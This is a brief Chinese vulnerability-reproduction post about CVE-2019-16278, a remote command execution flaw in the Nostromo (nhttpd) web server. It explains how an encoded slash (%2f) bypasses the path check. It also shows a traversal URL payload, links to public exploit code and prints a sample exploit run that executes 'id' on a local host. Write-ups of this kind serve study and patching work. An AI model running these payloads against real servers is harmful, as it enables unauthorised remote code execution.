[漏洞复现]:CVE-2019-16278 Nostromo web server RCE

£可爱£侵袭症+ 提交于 2019-12-02 03:12:51

漏洞描述

Nostromo web server(nhttpd)是一个开源的web服务器,在Unix系统非常流行。

漏洞原因是web服务在对URL进行检查是在URL被解码前,攻击者可以将/转换为%2f就可绕过检查,之前出现过类似漏洞CVE-2011-0751,POC如下:

http://www.example.org/..%2flogs/access_log

利用前提

Nostromo version <= 1.9.6

漏洞复现

Python POC:https://github.com/sudohyak/exploit/blob/master/CVE-2019-16278/exploit.py

mark@mark-Pc:~/nhttpd-exploits$ ./CVE-2019-16278.sh 127.0.0.1 80 id
uid=1000(mark) gid=1000(mark) groups=1000(mark),0(root)

EXP: https://git.sp0re.sh/sp0re/Nhttpd-exploits

参考

https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html?utm_source=webcode.ca&utm_medium=web&utm_campaign=twitter
https://nosec.org/home/detail/3074.html

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!